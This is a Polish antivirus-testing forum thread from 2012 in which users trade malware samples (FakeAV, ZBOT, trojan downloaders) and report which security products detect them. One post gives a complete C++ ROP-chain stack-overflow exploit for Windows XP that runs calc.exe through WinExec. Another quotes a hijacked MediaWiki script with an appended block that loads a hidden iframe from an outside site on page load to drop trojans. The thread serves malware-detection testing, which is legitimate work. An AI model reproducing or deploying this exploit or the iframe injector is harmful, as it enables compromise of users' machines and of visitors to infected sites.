Paczki, malware, złośliwe pliki, linki itp.

[ELWIS1]

To na pewno exploit. Niektóre laby mogą go jako czysty plik oznaczyć.

Eset, Avira, Kaspersky, Avast, Avg, ClamAV jakby w którymś labie był ten pik to na pewno by go wykryły.

Treść widoczna jedynie dla zarejestrowanych użytkowników

Iframe Injection

[tachion]

hmm dla mnie shellcode to jest niskopoziomowy program powinien ten kod uruchomić kalkulator

Kod:

OS-DLL''s used:
Base|Top | Size |Version (Important!)
___________|____________|____________|_____________________________
0x7c800000 | 0x7c8f6000 | 0x000f6000 | 5.1.2600.5781 [kernel32.dll]
0x7c900000 | 0x7c9b2000 | 0x000b2000 | 5.1.2600.6055 [ntdll.dll]
0x7e410000 | 0x7e4a1000 | 0x00091000 | 5.1.2600.5512 [USER32.dll]

UINT WINAPI WinExec(=> PTR to WinExec
__inLPCSTR lpCmdLine, => C:\WINDOWS\system32\calc.exe+00000000
__inUINT uCmdShow => 0x1
);
*/

#include <iostream>
#include "windows.h"

char shellcode[]=
"\xb1\x4f\x97\x7c"// POP ECX # RETN
"\xf9\x10\x47\x7e"// Writable PTR USER32.dll
"\x27\xfa\x87\x7c"// POP EDX # POP EAX # RETN
"\x43\x3a\x5c\x57"// ASCII "C:\W"
"\x49\x4e\x44\x4f"// ASCII "INDO"
"\x04\x18\x80\x7c"// MOV DWORD PTR DS:[ECX],EDX # MOV DWORD PTR DS:[ECX+4],EAX # POP EBP # RETN 04
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\xe5\x02\x88\x7c"// POP EAX # RETN
"\x57\x53\x5c\x73"// ASCII "WS\s"
"\x38\xd6\x46\x7e"// MOV DWORD PTR DS:[ECX+8],EAX # POP ESI # POP EBP # RETN 08
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\xe5\x02\x88\x7c"// POP EAX # RETN
"\x79\x73\x74\x65"// ASCII "yste"
"\xcb\xbe\x45\x7e"// MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\xe5\x02\x88\x7c"// POP EAX # RETN
"\x63\x61\x6c\x63"// ASCII "calc"
"\x31\xa9\x91\x7c"// MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\xe5\x02\x88\x7c"// POP EAX # RETN
"\x6d\x33\x32\x5c"// ASCII "m32\"
"\xcb\xbe\x45\x7e"// MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\xe5\x02\x88\x7c"// POP EAX # RETN
"\x2e\x65\x78\x65"// ASCII ".exe"
"\x31\xa9\x91\x7c"// MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\x9e\x2e\x92\x7c"// XOR EAX,EAX # RETN
"\x31\xa9\x91\x7c"// MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\xee\x4c\x97\x7c"// DEC ECX # RETN
"\xee\x4c\x97\x7c"// DEC ECX # RETN
"\xee\x4c\x97\x7c"// DEC ECX # RETN
"\xee\x4c\x97\x7c"// DEC ECX # RETN
"\xee\x4c\x97\x7c"// DEC ECX # RETN
"\xee\x4c\x97\x7c"// DEC ECX # RETN
"\xee\x4c\x97\x7c"// DEC ECX # RETN
"\xee\x4c\x97\x7c"// DEC ECX # RETN
//-------------------------------------------["C:\WINDOWS\system32\calc.exe+00000000" -> ecx]-//
"\xe5\x02\x88\x7c"// POP EAX # RETN
"\x7a\xeb\xc3\x6f"// Should result in a valid PTR in kernel32.dll
"\x4f\xda\x85\x7c"// PUSH ESP # ADC BYTE PTR DS:[EAX+CC4837C],AL # XOR EAX,EAX # INC EAX # POP EDI # POP EBP # RETN 08
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x32\xd9\x44\x7e"// XCHG EAX,EDI # RETN
"\x62\x28\x97\x7c"// ADD EAX,20 # POP EBP # RETN
"\x8a\x20\x87\x7c"// Compensate POP
"\x62\x28\x97\x7c"// ADD EAX,20 # POP EBP # RETN
"\x8a\x20\x87\x7c"// Compensate POP
"\x62\x28\x97\x7c"// ADD EAX,20 # POP EBP # RETN
"\x8a\x20\x87\x7c"// Compensate POP
"\x62\x28\x97\x7c"// ADD EAX,20 # POP EBP # RETN
"\x8a\x20\x87\x7c"// Compensate POP
//-----------------------------------------------------------[Save Stack Pointer + pivot eax]-//
"\xd6\xd1\x95\x7c"// MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x33\x80\x97\x7c"// INC EAX # RETN
"\x33\x80\x97\x7c"// INC EAX # RETN
"\x33\x80\x97\x7c"// INC EAX # RETN
"\x33\x80\x97\x7c"// INC EAX # RETN
"\xf5\xd6\x91\x7c"// XOR ECX,ECX # RETN
"\x07\x3d\x96\x7c"// INC ECX # RETN
"\xd6\xd1\x95\x7c"// MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\xb1\x4f\x97\x7c"// POP ECX # RETN
"\xed\x2a\x86\x7c"// WinExec()
"\xe7\xc1\x87\x7c"// MOV DWORD PTR DS:[EAX+4],ECX # XOR EAX,EAX # POP EBP # RETN 04
"\x8a\x20\x87\x7c"// Compensate POP
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Compensate RETN
"\x8a\x20\x87\x7c"// Final RETN for WinExec()
"\x8a\x20\x87\x7c"; // Compensate WinExec()
//------------------------------------------------------[Write Arguments and execute -> calc]-//

void buff() {
    char a;
    memcpy((&a)+5, shellcode, sizeof(shellcode)); // Compiler dependent, works with Dev-C++ 4.9
}

int main()
{
LoadLibrary("USER32.dll"); // we need this dll
    char buf[1024];
    buff();
    return 0;
}

[ELWIS1]

Tachion to ten exploit?

[tachion]

tak

[McAlex]

Iframe Injection

Stronka zapisuje na dysku dwa trojany.
Oba wykryte przez Hitman Pro i Panda Cloud (ale Miś dopiero przy skanie je zneutralizował).

[ELWIS1]

Świężutki FakeAV

Treść widoczna jedynie dla zarejestrowanych użytkowników

[ktośtam]

Świężutki FakeAV

Treść widoczna jedynie dla zarejestrowanych użytkowników

HitmanPro :

Kod:

Malware _____________________________________________________________________

C:\Users\Paweł\Desktop\amateur_dog_sex_01.avi.exe
Size . . . . . . . : 579 584 bytes
Age. . . . . . . : 0.0 days (2012-11-08 21:14:56)
Entropy. . . . . : 7.5
SHA-256. . . . . : 444A93703FB3D59B77925ECA625C3DE1624D26FEA46B02A71824E41E150024B8
> DrWeb. . . . . . :Trojan.Fakealert.34707

[tachion]

ten iframe rozbicie na poszczególne skrypty i przekierowania

[Aby zobaczyć linki, zarejestruj się tutaj]

i tu pies pogrzebany

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

[PascalHP]

Świężutki FakeAV

Treść widoczna jedynie dla zarejestrowanych użytkowników

BullGuard wykrywa behawioralnie.

To na pewno exploit. Niektóre laby mogą go jako czysty plik oznaczyć.

Eset, Avira, Kaspersky, Avast, Avg, ClamAV jakby w którymś labie był ten pik to na pewno by go wykryły.

Treść widoczna jedynie dla zarejestrowanych użytkowników

Iframe Injection

BullGuard blokuje dostęp do strony.

NEW! Trojan-Downloader.Win32.Andromeda.cwy

Treść widoczna jedynie dla zarejestrowanych użytkowników

BullGuard wykrywa sygnaturami.

[tachion]

fakeav to System Protection Progressive

[ELWIS1]

Treść widoczna jedynie dla zarejestrowanych użytkowników

Dla wielbicieli wibratorów

[tachion]

Świeżynki jeszcze vt nie widziało

2x FakeAV - System Protection Progressive

Treść widoczna jedynie dla zarejestrowanych użytkowników

4X ZBOT

Treść widoczna jedynie dla zarejestrowanych użytkowników

[ELWIS1]

Tachion, kurde duzo tych FakeAV dziennie tworzą

[tachion]

No tych teraz właśnie najwięcej no i zboty też ostatnio się wysypały

---

Dodano: 08 lis 2012, 22:28

i ta stronka
skrypty
[script]

[Aby zobaczyć linki, zarejestruj się tutaj]

[script]

[Aby zobaczyć linki, zarejestruj się tutaj]

[script]

[Aby zobaczyć linki, zarejestruj się tutaj]

i tu wywłoka

Treść widoczna jedynie dla zarejestrowanych użytkowników

wyedytowane i kod zaznaczony na czerwono

// remote scripting library
// © copyright 2005 modernmethod, inc
var sajax_debug_mode = false;
var sajax_request_type = "GET";

/**
* if sajax_debug_mode is true, this function outputs given the message into
* the element with id = sajax_debug; if no such element exists in the document,
* it is injected.
*/
function sajax_debug(text) {
if (!sajax_debug_mode) return false;

var e= document.getElementById(''sajax_debug'');

if (!e) {
e= document.createElement("p");
e.className= ''sajax_debug'';
e.id= ''sajax_debug'';

var b= document.getElementsByTagName("body")[0] ;

if (b.firstChild) b.insertBefore(e, b.firstChild);
else b.appendChild(e);
}

var m= document.createElement("div");
m.appendChild( document.createTextNode( text ) );

e.appendChild( m );

return true;
}

/**
* compatibility wrapper for creating a new XMLHttpRequest object.
*/
function sajax_init_object() {
sajax_debug("sajax_init_object() called..")
var A;
try {
// Try the new style before ActiveX so we don''t
// unnecessarily trigger warnings in IE 7 when
// set to prompt about ActiveX usage
A = new XMLHttpRequest();
} catch (e) {
try {
A=new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
A=new ActiveXObject("Microsoft.XMLHTTP");
} catch (oc) {
A=null;
}
}
}
if (!A)
sajax_debug("Could not create connection object.");

return A;
}

/**
* Perform an ajax call to mediawiki. Calls are handeled by Ajaispatcher.php
* func_name - the name of the function to call. Must be registered in $wgAjaxExportList
* args - an array of arguments to that function
* target - the target that will handle the result of the call. If this is a function,
*if will be called with the XMLHttpRequest as a parameter; if it''s an input
*element, its value will be set to the resultText; if it''s another type of
*element, its innerHTML will be set to the resultText.
*
* Example:
*sajax_do_call(''doFoo'', [1, 2, 3] , document.getElementById("showFoo"));
*
* This will call the doFoo function via MediaWiki''s Ajaispatcher, with
* (1, 2, 3) as the parameter list, and will show the result in the element
* with id = showFoo
*/
function sajax_do_call(func_name, args, target) {
var i, x, n;
var uri;
var post_data;
uri = wgServer +
((wgScript == null) ? (wgScriptPath + "/index.php") : wgScript) +
"?action=ajax";
if (sajax_request_type == "GET") {
if (uri.indexOf("?") == -1)
uri = uri + "?rs=" + encodeURIComponent(func_name);
else
uri = uri + "&rs=" + encodeURIComponent(func_name);
for (i = 0; i < args.length; i++)
uri = uri + "&rsargs[] =" + encodeURIComponent(args[i] );
//uri = uri + "&rsrnd=" + new Date().getTime();
post_data = null;
} else {
post_data = "rs=" + encodeURIComponent(func_name);
for (i = 0; i < args.length; i++)
post_data = post_data + "&rsargs[] =" + encodeURIComponent(args[i] );
}
x = sajax_init_object();
if (!x) {
alert("AJAX not supported");
return false;
}

try {
x.open(sajax_request_type, uri, true);
} catch (e) {
if (window.location.hostname == "localhost") {
alert("Your browser blocks XMLHttpRequest to ''localhost'', try using a real hostname for development/testing.");
}
throw e;
}
if (sajax_request_type == "POST") {
x.setRequestHeader("Method", "POST " + uri + " HTTP/1.1");
x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
}
x.setRequestHeader("Pragma", "cache=yes");
x.setRequestHeader("Cache-Control", "no-transform");
x.onreadystatechange = function() {
if (x.readyState != 4)
return;

sajax_debug("received (" + x.status + " " + x.statusText + ") " + x.responseText);

//if (x.status != 200)
// alert("Error: " + x.status + " " + x.statusText + ": " + x.responseText);
//else

if ( typeof( target ) == ''function'' ) {
target( x );
}
else if ( typeof( target ) == ''object'' ) {
if ( target.tagName == ''INPUT'' ) {
if (x.status == 200) target.value= x.responseText;
//else alert("Error: " + x.status + " " + x.statusText + " (" + x.responseText + ")");
}
else {
if (x.status == 200) target.innerHTML = x.responseText;
else target.innerHTML= "<div class=''error''>Error: " + x.status + " " + x.statusText + " (" + x.responseText + ")</div>";
}
}
else {
alert("bad target for sajax_do_call: not a function or object: " + target);
}

return;
}

sajax_debug(func_name + " uri = " + uri + " / post = " + post_data);
x.send(post_data);
sajax_debug(func_name + " waiting..");
delete x;

return true;
}

/**
* @return boolean whether the browser supports XMLHttpRequest
*/
function wfSupportsAjax() {
var request = sajax_init_object();
var supportsAjax = request ? true : false;
delete request;
return supportsAjax;
}



/*ef09d2*/
function frmAdd() { var ifrm = document.createElement(''iframe''); ifrm.style.position=''absolute''; ifrm.style.top=''-999em''; ifrm.style.left=''-999em''; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = ''frmId'';document.body.appendChild(ifrm);};window.onload = frmAdd;
/*/ef09d2*/

[PascalHP]

i tu wywłoka

Treść widoczna jedynie dla zarejestrowanych użytkowników

BullGuard IS 2013 wykrywa.

---

Dodano: 08 lis 2012, 22:51

Świeżynki jeszcze vt nie widziało

2x FakeAV - System Protection Progressive

Treść widoczna jedynie dla zarejestrowanych użytkowników

4X ZBOT

Treść widoczna jedynie dla zarejestrowanych użytkowników

FaveAV - blokowane behawioralnie.
ZBOT - pliki uruchomiły się.

---

Dodano: 08 lis 2012, 23:03

i tu wywłoka

Treść widoczna jedynie dla zarejestrowanych użytkowników

avast! IS 7 wykrywa.

---

Dodano: 08 lis 2012, 22:51

Świeżynki jeszcze vt nie widziało

2x FakeAV - System Protection Progressive

Treść widoczna jedynie dla zarejestrowanych użytkowników

4X ZBOT

Treść widoczna jedynie dla zarejestrowanych użytkowników

FaveAV - blokowane autosandbox''em - po analizie wykrywa niebezpieczne działania
ZBOT - blokowane autosandbox''em - po analizie wykrywa niebezpieczne działania

---

Dodano: 08 lis 2012, 23:22

GData IS 2013 zablokowała stronę, a złośliwe pliki monitorem zachowań.

[ELWIS1]

Exploit Adobe:

The file ''poc.pdf'' has been determined to be ''MALWARE''. Our analysts named the threat EXP/Pidief.dkc. The term "EXP/" denotes malware that is able to detect and use certain security vulnerabilities whereby the attacker can get control of the system. Detection will be added to our virus definition file (VDF) with one of the next updates.

[tommyklab]

To na pewno exploit. Niektóre laby mogą go jako czysty plik oznaczyć.

Eset, Avira, Kaspersky, Avast, Avg, ClamAV jakby w którymś labie był ten pik to na pewno by go wykryły.

Treść widoczna jedynie dla zarejestrowanych użytkowników

Iframe Injection

Trojan-Downloader.JS.Iframe.cqj

[myciu1974]

45 files

Treść widoczna jedynie dla zarejestrowanych użytkowników

Sophos Endpoint Security and Control
33/45 = 73.33%

Webroot SecureAnywhere
31/45 = 68.88%

TSPY_PASSTEAL.A

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

Treść widoczna jedynie dla zarejestrowanych użytkowników

Sophos Endpoint Security and Control
1/1 = 100%

Webroot SecureAnywhere
0/1 = 0%

Emsi 41/45
1/1

[preter]

Treść widoczna jedynie dla zarejestrowanych użytkowników

Dla wielbicieli wibratorów

Opera blokuje stronę

[tomatto007]

161 files - Identified as malicious on VT

Treść widoczna jedynie dla zarejestrowanych użytkowników